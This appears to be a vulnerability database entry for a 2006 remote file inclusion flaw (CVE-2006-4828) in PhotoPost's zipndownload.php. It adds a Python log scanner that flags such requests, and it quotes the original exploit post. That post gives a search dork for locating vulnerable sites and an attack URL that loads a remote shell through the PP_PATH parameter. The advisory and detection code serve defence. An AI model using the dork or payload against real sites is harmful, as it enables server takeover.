PhotoPost 'zipndownload.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111050
Vulnerability type: Input validation
Published: 2006-09-15
Updated: 2006-09-27
CVE ID: CVE-2006-4828
CNNVD-ID: CNNVD-200609-272
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2369
https://cxsecurity.com/issue/WLB-2006090109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-272
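|Vulnerability details
A PHP remote file inclusion vulnerability exists in zipndownload.php in PhotoPost. A remote attacker can execute arbitrary PHP code via a URL in the PP_PATH parameter.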
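As an added example (not part of the original advisory or of PhotoPost), the following Python sketch flags access-log entries in which a request to zipndownload.php supplies a URL in PP_PATH, including percent-encoded forms. The log lines are constructed samples, and the function names and combined log format are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starting with a scheme or wrapper (http:, ftp:, php:, data:) or "//host"
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.IGNORECASE)

# Constructed sample entries (documentation addresses, placeholder host)
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2006:10:00:00 +0000] "GET /gallery/zipndownload.php?PP_PATH=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [15/Sep/2006:10:00:05 +0000] "GET /gallery/zipndownload.php?cat=500 HTTP/1.1" 200 9120',
    '192.0.2.12 - - [15/Sep/2006:10:00:09 +0000] "GET /gallery/zipndownload.php?PP_PATH=%2568ttp%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 512',
    '192.0.2.13 - - [15/Sep/2006:10:00:12 +0000] "GET /gallery/zipndownload.php?PP_PATH=/var/www/gallery HTTP/1.1" 200 9120',
]

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded scheme is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_pp_path_rfi(log_lines, script="zipndownload.php", param="PP_PATH"):
    """Return (line_number, decoded_value) for requests passing a URL in PP_PATH."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/" + script):
            continue
        # parse_qsl decodes once; decode_fully handles further encoding layers
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            value = decode_fully(value)
            if key == param and REMOTE_RE.match(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in find_pp_path_rfi(SAMPLE_LOG):
        print(f"line {number}: PP_PATH={value}")
```

Access logs record only the request line, so a PP_PATH value sent in a POST body is visible only where request bodies are logged.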
|Exploit
#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI ARABIA=============================================
#Discovered By : Saudi Hackrz
#
#Contact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Friends
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net  ,www.xp10.com ,www.lezr.com
==================================I LOVE SAUDI ARABIA=============================================#

# milw0rm.com [2006-09-15]
|References

Source: BID
Name: 20028
Link: http://www.securityfocus.com/bid/20028
Source: XF
Name: photopost-zipdownload-file-include(28948)
Link: http://xforce.iss.net/xforce/xfdb/28948
Source: BUGTRAQ
Name: 20060914 PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/446031/100/0/threaded
Source: SREASON
Name: 1581
Link: http://securityreason.com/securityalert/1581